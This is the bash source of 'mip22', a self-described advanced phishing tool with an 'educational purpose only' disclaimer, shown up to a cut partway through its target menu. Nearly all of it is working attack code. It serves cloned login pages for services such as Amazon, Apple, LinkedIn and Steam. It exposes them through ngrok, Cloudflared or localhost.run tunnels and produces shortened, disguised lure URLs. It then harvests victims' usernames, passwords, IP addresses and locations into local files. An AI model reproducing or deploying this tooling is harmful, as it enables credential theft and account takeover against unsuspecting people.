| 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740741742743744745746747748749750751752753754755756757758759760761762763764765766767768769770771772773774775776777778779780781782783784785786787788789790791792793794795796797798799800801802803804805806807808809810811812813814815816817818819820821822823824825826827828829830831832833834835836837838839840841842843844845846847848849850851852853854855856857858859860861862863864865866867868869870871872873874875876877878879880881882883884885886887888889890891892893894895896897898899900901902903904905906907908909910911912913914915916917918919920921922923924925926927928929930931932933934935936937938939940941942943944945946947948949950951952953954955956957958959960961962963964965966967968969970971972973974975976977978979980981982983984985986987988989990991992993994995996997998999100010011002100310041005100610071008100910101011101210131014101510161017101810191020102110221023102410251026102710281029103010311032103310341035103610371038103910401041104210431044104510461047104810491050105110521053105410551056105710581059106010611062106310641065106610671068106910701071107210731074107510761077107810791080108110821083108410851086108710881089109010911092109310941095109610971098109911001101110211031104110511061107110811091110111111121113111411151116111711181119112011211122112311241125112611271128112911301131113211331134113511361137113811391140114111421143114411451146114711481149115011511152115311541155115611571158115911601161116211631164116511661167116811691170117111721173117411751176117711781179118011811182118311841185118611871188118911901191119211931194119511961197119811991200120112021203120412051206120712081209121012111212121312141215121612171218121912201221122212231224122512261227122812291230123112321233123412351236123712381239124012411242124312441245124612471248124912501251125212531254125512561257125812591260126112621263126412651266126712681269127012711272127312741275127612771278127912801281128212831284128512861287128812891290129112921293129412951296129712981299130013011302130313041305130613071308130913101311131213131314131513161317131813191320132113221323132413251326132713281329133013311332133313341335133613371338133913401341134213431344134513461347134813491350135113521353135413551356135713581359136013611362136313641365136613671368136913701371137213731374137513761377137813791380138113821383138413851386138713881389139013911392139313941395139613971398139914001401140214031404140514061407140814091410141114121413141414151416141714181419142014211422142314241425142614271428142914301431143214331434143514361437143814391440144114421443144414451446144714481449145014511452145314541455145614571458145914601461146214631464146514661467146814691470147114721473 |
- #!/bin/bash
- #
- # Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
- # mip22 is a advanced phishing tool.
- #
- # mip22 is free software: you can redistribute it and/or modify
- # it under the terms of the GNU Affero General Public License as published by
- # the Free Software Foundation, either version 3 of the License, or
- # (at your option) any later version.
- #
- # mip22 is distributed in the hope that it will be useful,
- # but WITHOUT ANY WARRANTY; without even the implied warranty of
- # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- # GNU Affero General Public License for more details.
- #
- # You should have received a copy of the GNU Affero General Public License
- # along with this program. If not, see <http://www.gnu.org/licenses/>.
- #
- #
- #permissions
- chmod -R 777 packages.sh
- chmod -R 777 tunnels.sh
- chmod -R 777 data.txt
- chmod -R 777 fingerprints.txt
- chmod -R 777 .host
- chmod -R 777 .manual_attack
- chmod -R 777 .music
- chmod -R 777 .pages
- chmod -R 777 .tunnels_log
- chmod -R 777 .www
- #Install packages and tunnels
- check_os_and_install_packages() {
-
- if [[ -f .host/ngrok && -f .host/cloudflared ]]; then
- { clear; }
- else
- { clear; header; }
- OS_SYSTEM=$(uname -o)
- if [ $OS_SYSTEM != Android ]; then
- bash packages.sh
- bash tunnels.sh
- else
- ./packages.sh
- ./tunnels.sh
-
- fi
- fi
-
- }
- # Check os for root
- check_root_and_os() {
-
- OS_SYSTEM=$(uname -o)
- if [ $OS_SYSTEM != Android ]; then
- if [[ "${EUID:-$(id -u)}" -ne 0 ]]; then
- { clear; header; }
- echo -e "The program cannot run.\nFor run program in GNU/Linux Operating System,\nGive root privileges and try again. \n"
- exit 1
- fi
- fi
- }
- # Terminal Colors
- RED="$(printf '\033[31m')"
- GREEN="$(printf '\033[32m')"
- ORANGE="$(printf '\033[33m')"
- BLUE="$(printf '\033[34m')"
- MAGENTA="$(printf '\033[35m')"
- CYAN="$(printf '\033[36m')"
- WHITE="$(printf '\033[37m')"
- BLACK="$(printf '\033[30m')"
- ORANGEBG="$(printf '\033[43m')"
- BLUEBG="$(printf '\033[44m')"
- RESETFG="$(printf '\e033[0m')"
- RESETBG="$(printf '\e[0m\n')"
- # Directories
- if [[ ! -d ".host" ]]; then
- mkdir -p ".host"
- fi
- if [[ ! -d ".www" ]]; then
- mkdir -p ".www"
- fi
- # Clear content of log files
- truncate -s 0 .tunnels_log/.cloudfl.log
- truncate -s 0 .tunnels_log/.localrun.log
- pid_kill() {
-
- #kill all pid for php, ngrok and cloudflared
- if [[ `pidof php` ]]; then
- killall php > /dev/null 2>&1
- fi
- if [[ `pidof ngrok` ]]; then
- killall ngrok > /dev/null 2>&1
- fi
- if [[ `pidof cloudflared` ]]; then
- killall cloudflared > /dev/null 2>&1
- fi
- }
- header(){
-
- printf "${BLUE}"
- cat <<- EOF
-
- ${BLUE} ███╗ ███╗██╗███████╗███████╗██╗ ██████╗ ███╗ ██╗███████╗ ${RED} o
- ${BLUE} ████╗ ████║██║██╔════╝██╔════╝██║██╔═══██╗████╗ ██║██╔════╝ ${RED} d8b
- ${BLUE} ██╔████╔██║██║███████╗███████╗██║██║ ██║██╔██╗ ██║███████╗ ${RED} d888b
- ${BLUE} ██║╚██╔╝██║██║╚════██║╚════██║██║██║ ██║██║╚██╗██║╚════██║ ${RED}"Y888888888P"
- ${BLUE} ██║ ╚═╝ ██║██║███████║███████║██║╚██████╔╝██║ ╚████║███████║ ${RED} "Y88888P"
- ${BLUE} ╚═╝ ╚═╝╚═╝╚══════╝╚══════╝╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚══════╝ ${RED} d88P"Y88b
- ${BLUE} ██╗███╗ ███╗██████╗ ██████╗ ███████╗███████╗██╗██████╗ ██╗ ███████╗███████╗ ${RED}dP" "Yb
- ${BLUE} ██║████╗ ████║██╔══██╗██╔═══██╗██╔════╝██╔════╝██║██╔══██╗██║ ██╔════╝██╔════╝
- ${BLUE} ██║██╔████╔██║██████╔╝██║ ██║███████╗███████╗██║██████╔╝██║ █████╗ ███████╗ d88b d88b
- ${BLUE} ██║██║╚██╔╝██║██╔═══╝ ██║ ██║╚════██║╚════██║██║██╔══██╗██║ ██╔══╝ ╚════██║ " dP " dP
- ${BLUE} ██║██║ ╚═╝ ██║██║ ╚██████╔╝███████║███████║██║██████╔╝███████╗███████╗███████║ dP dP
- ${BLUE} ═╝╚═╝ ╚═╝╚═╝ ╚═════╝ ╚══════╝╚══════╝╚═╝╚═════╝ ╚══════╝╚══════╝╚══════╝ d888 d888
- ${BLUE}
- ${CYAN}Mip22 tool made for educational purpose only. ${ORANGE}Version: 3.0
- ${CYAN}The author is not responsible for any malicious use of the program.
- ${CYAN} Mip Created by ${ORANGE}makdosx ${CYAN}(https://github.com/makdosx) ${WHITE}
-
- EOF
- printf "${RESETBG}"
- }
- log_info(){
-
- bold=$(tput bold)
- normal=$(tput sgr0)
-
- printf "${GREEN}"
- cat <<- EOF
- $bold _ _
- $bold | _ _ o ._ o ._ _|_ _ |_ _ ._ _|
- $bold |_ (_) (_| | | | | | | | (_) | (_) |_| | | (_|
- $bold _|
-
- EOF
- printf "${RESETBG}"
- }
- # Php webserver and port
- host='127.0.0.1'
- port='8080'
- setup_clone(){
-
- # Setup cloned page and server
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Setting up cloned page..."${WHITE}
- rm -rf .www/*
- cp -rf .pages/"$site"/* .www
- echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Starting your php server..."${WHITE}
- cd .www && php -S "$host":"$port" > /dev/null 2>&1 &
- }
- setup_clone_manual() {
- rm -rf .www/*
-
- cp -rf .manual_attack/index.html .www
- cp -rf .manual_attack/post.php .www
- cp -rf .manual_attack/__ROOT__/index.php .www
- cp -rf .manual_attack/__ROOT__/fingerprints.php .www
-
-
- rm -rf .manual_attack/index.html
- rm -rf .manual_attack/post.php
- rm -rf .manual_attack/data.txt
-
- echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Starting your php server..."${WHITE}
- cd .www && php -S "$host":"$port" > /dev/null 2>&1 &
- }
- ## Get IP address
- get_fingerprints() {
- IP=$(grep -a 'IP:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
- Full_Date=$(grep -a 'Full-Date:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
- Country=$(grep -a 'Country:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
- Region=$(grep -a 'Region:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
- City=$(grep -a 'City:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
- User_Agent=$(grep -a 'User-Agent:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
- OS_System=$(grep -a 'OS-System:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
- IFS=$'\n'
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Victim Fingerprints.. "
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} IP: ${BLUE}$IP"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Full Date: ${BLUE}$Full_Date"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Country: ${BLUE}$Country"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Region: ${BLUE}$Region"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} City: ${BLUE}$City"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} User-Agent: ${BLUE}$User_Agent"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} OS System: ${BLUE}$OS_System"
- echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Saved in : ${MAGENTA}fingerprints.txt"
- cat .www/fingerprints.txt >> fingerprints.txt
- }
- # Get credentials from victims
- get_creds() {
- ACC=$(grep -o 'Username:.*' .www/data.txt | cut -d " " -f2)
- PASS=$(grep -o 'Password:.*' .www/data.txt | cut -d ":" -f2)
- IFS=$'\n'
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Account : ${WHITE}$ACC"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Password : ${WHITE}$PASS"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Saved in : ${ORANGE}data.txt"
- cat .www/data.txt >> data.txt
- echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Waiting for Next Fingerptints and Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. "
- }
- # Get credentials from victims manual method
- get_creds_manual() {
- ACC=$(tail -n 20 .www/data.txt)
- IFS=$'\n'
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Account : ${WHITE}$ACC"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Saved in : ${ORANGE}data.txt"
- cat .www/data.txt >> data.txt
- echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Waiting for Next Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. "
- }
- # Print credentials from victim
- credentials() {
-
- echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Waiting for Victim fingerprints and Login Info.. ${BLUE}Ctrl + C ${MAGENTA}to exit..."
-
- while true; do
-
- if [[ -e ".www/fingerprints.txt" ]]; then
- echo -e "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Fingerprints Victim Found!"
- get_fingerprints
- rm -rf .www/fingerprints.txt
- fi
-
- sleep 0.75
-
- if [[ -e ".www/data.txt" ]]; then
- notice_login
- echo -e "\n"
- log_info
- #echo -e "\n\n \033[31;5;7m Login info Found! \033[37m"
- #echo -e "${RESETBG}"
- get_creds
- rm -rf .www/data.txt
- fi
-
- sleep 0.75
-
- done
- }
- # Print credentials from victim manual
- credentials_manual() {
-
- echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Waiting for Victim fingerprints and Login Info.. ${BLUE}Ctrl + C ${MAGENTA}to exit..."
-
- while true; do
-
- if [[ -e ".www/fingerprints.txt" ]]; then
- echo -e "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Fingerprints Victim Found!"
- get_fingerprints
- rm -rf .www/fingerprints.txt
- fi
-
- sleep 0.75
-
- if [[ -e ".www/data.txt" ]]; then
- notice_login
- echo -e "\n"
- log_info
- #echo -e "\n\n \033[31;5;7m Login info Found! \033[37m"
- #echo -e "${RESETBG}"
- get_creds_manual
- rm -rf .www/data.txt
- fi
-
- sleep 0.75
-
- done
- }
- # Localhost Start
- localhost_start() {
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${GREEN}( ${CYAN}http://$host:$port ${GREEN})"
- setup_clone
- { sleep 1; clear; header; }
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Successfully Hosted in : ${GREEN}${CYAN}http://$host:$port ${GREEN}"
- credentials
- }
- # Localhost Start
- localhost_start_manual() {
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${GREEN}( ${CYAN}http://$host:$port ${GREEN})"
- setup_clone_manual
- { sleep 1; clear; header; }
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Successfully Hosted in : ${GREEN}${CYAN}http://$host:$port ${GREEN}"
- credentials_manual
- }
- #ngrok token setup
- ngrok_setup_token() {
-
- { clear; header; echo; }
- cat <<- EOF
- ${GREEN}[${WHITE}1${GREEN}]${CYAN} Ngrok Toekn
- ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
-
-
- EOF
-
-
- read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Api : ${WHITE}"${WHITE}
- case $REPLY in
-
- 1)
- echo "Please insert yout ngrok authtoken (only key):"
- read authtoken
-
- if [[ `command -v termux-chroot` ]]; then
- termux-chroot ./.host/ngrok authtoken $authtoken
- sleep 2 && menu
-
- else
- ./.host/ngrok authtoken $authtoken
- sleep 2 && menu
- fi ;;
-
-
- 99) menu;;
-
-
- *)
- echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
- { sleep 0.7; ngrok_setup_token;};;
-
- esac
- }
- apis() {
-
- { clear; header; echo; }
- cat <<- EOF
- ${GREEN}[${WHITE}1${GREEN}]${CYAN} Ngrok
- ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
-
-
- EOF
-
- read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Api : ${WHITE}"${WHITE}
- case $REPLY in
-
- 1) ngrok_setup_token;;
-
- 99) menu;;
-
- *)
- echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Api, Try Again..."
- { sleep 0.7; apis;};;
-
- esac
-
- }
- # Start ngrok
- ngrok_start() {
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
- { sleep 1; setup_clone; }
- echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching Ngrok..."
- if [[ `command -v termux-chroot` ]]; then
- sleep 2 && termux-chroot ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
- else
- sleep 2 && ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
- fi
- { sleep 9; clear; header; }
-
- ngrok_url=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.ngrok.io")
- ngrok_url1=${ngrok_url#https://}
-
- url_short=$(curl -s 'https://is.gd/create.php?format=simple&url='"$ngrok_url1")
-
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$ngrok_url1"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$ngrok_url"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$ngrok_url1"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL shortener : ${GREEN}$url_short"
-
- credentials
- }
- # Start ngrok
- ngrok_start_manual() {
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
- { sleep 1; setup_clone_manual; }
- echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching Ngrok..."
- if [[ `command -v termux-chroot` ]]; then
- sleep 2 && termux-chroot ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
- else
- sleep 2 && ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
- fi
- { sleep 9; clear; header; }
-
- ngrok_url=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.ngrok.io")
- ngrok_url1=${ngrok_url#https://}
-
- url_short=$(curl -s 'https://is.gd/create.php?format=simple&url='"$ngrok_url1")
-
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$ngrok_url1"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$ngrok_url"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$ngrok_url1"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL shortener : ${GREEN}$url_short"
-
- credentials_manual
- }
- # Start Cloudflared
- #
- cloudflared_start() {
-
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${GREEN})"
- { sleep 1; setup_clone; }
- echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGETNA} Launching Cloudflared..."
- if [[ `command -v termux-chroot` ]]; then
- sleep 2 && termux-chroot ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
- else
- sleep 2 && ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
- fi
- { sleep 12; clear; header; }
-
- cldflr_url=$(grep -o 'https://[-0-9a-z]*\.trycloudflare.com' ".tunnels_log/.cloudfl.log")
- cldflr_url1=${cldflr_url#https://}
-
- url_short=$(curl -s 'https://is.gd/create.php?format=simple&url='"$cldflr_url1")
-
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$cldflr_url1"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$cldflr_url"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$cldflr_url1"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL shortener : ${GREEN}$url_short"
-
- credentials
- }
- # Start Cloudflared
- #
- cloudflared_start_manual() {
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${GREEN})"
- { sleep 1; setup_clone_manual; }
- echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching Cloudflared..."
- if [[ `command -v termux-chroot` ]]; then
- sleep 2 && termux-chroot ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
- else
- sleep 2 && ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
- fi
- { sleep 12; clear; header; }
-
- cldflr_url=$(grep -o 'https://[-0-9a-z]*\.trycloudflare.com' ".tunnels_log/.cloudfl.log")
- cldflr_url1=${cldflr_url#https://}
-
- url_short=$(curl -s 'https://is.gd/create.php?format=simple&url='"$cldflr_url1")
-
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$cldflr_url1"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$cldflr_url"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$cldflr_url1"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL shortener : ${GREEN}$url_short"
-
- credentials_manual
- }
- # Start localrun
- localhostrun_start() {
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
- { sleep 1; setup_clone; }
- echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching LocalhostRun..."
- if [[ `command -v termux-chroot` ]]; then
- sleep 2 && termux-chroot ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
- else
- sleep 2 && ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
- fi
- { sleep 9; clear; header; }
-
- localrun_url=$(grep -o 'https://[-0-9a-z]*\.lhrtunnel.link' ".tunnels_log/.localrun.log")
- localrun_url1=${localrun_url#https://}
-
- url_short=$(curl -s 'https://is.gd/create.php?format=simple&url='"$localrun_url1")
-
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$localrun_url1"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL https(s) : ${GREEN}$localrun_url"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$localrun_url1"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL shortener : ${GREEN}$url_short"
-
- credentials
- }
- # Start localrun
- localhostrun_start_manual() {
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
- { sleep 1; setup_clone_manual; }
- echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching LocalhostRun..."
- if [[ `command -v termux-chroot` ]]; then
- sleep 2 && termux-chroot ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
- else
- sleep 2 && ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
- fi
- { sleep 9; clear; header; }
-
- localrun_url=$(grep -o 'https://[-0-9a-z]*\.lhrtunnel.link' ".tunnels_log/.localrun.log")
- localrun_url1=${localrun_url#https://}
-
- url_short=$(curl -s 'https://is.gd/create.php?format=simple&url='"$localrun_url1")
-
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$localrun_url1"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL https(s) : ${GREEN}$localrun_url"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$localrun_url1"
- echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL shortener : ${GREEN}$url_short"
-
- credentials_manual
- }
- # Select Tunnel
- tunnel() {
- { clear; header; }
- cat <<- EOF
- ${GREEN}[${WHITE}1${GREEN}]${CYAN} Localhost ${MAGENTA} (for practise only)
- ${GREEN}[${WHITE}2${GREEN}]${CYAN} LocalhostRun ${MAGENTA} (alternative)
- ${GREEN}[${WHITE}3${GREEN}]${CYAN} Cloudflared ${MAGENTA} (recommended)
- ${GREEN}[${WHITE}4${GREEN}]${CYAN} Ngrok ${MAGENTA} (first install token from menu)
- EOF
- read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select a port forwarding service : ${WHITE}"
- case $REPLY in
- 1)
- localhost_start;;
-
- 2)
- localhostrun_start;;
-
- 3)
- cloudflared_start;;
-
- 4)
- ngrok_start;;
-
-
- *)
- echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${RED} Invalid Option, Try Again..."
- { sleep 1; header; tunnel;};;
- esac
- }
- start_manual_method() {
-
- cd .manual_attack && php -S "127.0.0.1:8081" > /dev/null 2>&1 &
- echo -e "\n${GREEN}[${WHITE}-${GREEN}] ${GREEN} Visit ${WHITE} http://127.0.0.1:8081 ${GREEN} for setup clone page "${WHITE}
- echo -e "\n${GREEN}[${WHITE}-${GREEN}] ${GREEN} After setup clone page return to here and continue... "${WHITE}
- }
- # Select Tunnel
- tunnel_manual() {
- { clear; header; }
-
-
- start_manual_method
-
- cat <<- EOF
- ${GREEN}[${WHITE}1${GREEN}]${CYAN} Localhost ${MAGENTA} (for practise only)
- ${GREEN}[${WHITE}2${GREEN}]${CYAN} LocalhostRun ${MAGENTA} (alternative)
- ${GREEN}[${WHITE}3${GREEN}]${CYAN} Cloudflared ${MAGENTA} (recommended)
- ${GREEN}[${WHITE}4${GREEN}]${CYAN} Ngrok ${MAGENTA} (first install token from menu)
- EOF
- read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select a port forwarding service : ${WHITE}"
- case $REPLY in
- 1)
- localhost_start_manual;;
-
- 2)
- localhostrun_start_manual;;
-
- 3)
- cloudflared_start_manual;;
-
- 4)
- ngrok_start_manual;;
-
-
- *)
- echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${RED} Invalid Option, Try Again..."
- { sleep 1; header; tunnel;};;
- esac
- }
- vpn_setup() {
-
- { clear; header; echo; }
- cat <<- EOF
- ${GREEN}[${WHITE}1${GREEN}]${CYAN} Psiphon Vpn
- ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
-
-
- EOF
-
-
- read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Api : ${WHITE}"${WHITE}
- case $REPLY in
-
- 1)
-
- if [[ `command -v termux-chroot` ]]; then
- echo "https://play.google.com/store/apps/details?id=com.psiphon3.subscription"
- sleep 4 && menu
-
- else
- echo "https://play.google.com/store/apps/details?id=com.psiphon3.subscription"
- #echo 'Not Supported. Setup your vpn manual'
- sleep 4 && menu
- fi ;;
-
-
- 99) menu;;
-
-
- *)
- echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
- { sleep 0.7; ngrok_setup_token;};;
-
- esac
- }
- play_music() {
-
- { clear; header; }
-
- cat <<- EOF
- ${GREEN}[${WHITE}1${GREEN}]${CYAN} Play Music
- ${GREEN}[${WHITE}2${GREEN}]${CYAN} Stop Music
- ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
-
- ${MAGENTA} If you select this option which is the background music then you may
- ${MAGENTA} not see the attacker's details directly in the terminal.
- ${MAGENTA} If you not seen the data pause the music and restart the program again.
-
- ${MAGENTA} However, they have been saved in the data txt file.
-
-
- EOF
-
-
- read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Option : ${WHITE}"${WHITE}
- case $REPLY in
-
- 1)
- xterm -e nohup mpv .music/mis_song.mp3 > /dev/null 2>&1
- menu;;
-
-
- 2)
- pidof mpv && killall mpv > /dev/null 2>&1
- menu;;
-
- 99)
- menu;;
-
- *)
- echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again...";;
-
- esac
-
-
- }
- notice_login()
- {
- xterm -e nohup mpv .notifications/find_login.mp3 > /dev/null 2>&1
- }
- attack() {
-
- { clear; header; echo; }
- cat <<- EOF
- ${GREEN}[${WHITE}1${GREEN}]${CYAN} Adobe ${GREEN}[${WHITE}25${GREEN}]${CYAN} Line ${GREEN}[${WHITE}49${GREEN}]${CYAN} Spotify
- ${GREEN}[${WHITE}2${GREEN}]${CYAN} Amazon ${GREEN}[${WHITE}26${GREEN}]${CYAN} LinkedIn ${GREEN}[${WHITE}50${GREEN}]${CYAN} Stackoverflow
- ${GREEN}[${WHITE}3${GREEN}]${CYAN} Apple ${GREEN}[${WHITE}27${GREEN}]${CYAN} Livejournal ${GREEN}[${WHITE}51${GREEN}]${CYAN} Steam
- ${GREEN}[${WHITE}4${GREEN}]${CYAN} Baddo ${GREEN}[${WHITE}28${GREEN}]${CYAN} Mediafire ${GREEN}[${WHITE}52${GREEN}]${CYAN} Tagged
- ${GREEN}[${WHITE}5${GREEN}]${CYAN} Care2 ${GREEN}[${WHITE}29${GREEN}]${CYAN} MeWe ${GREEN}[${WHITE}53${GREEN}]${CYAN} Telegram
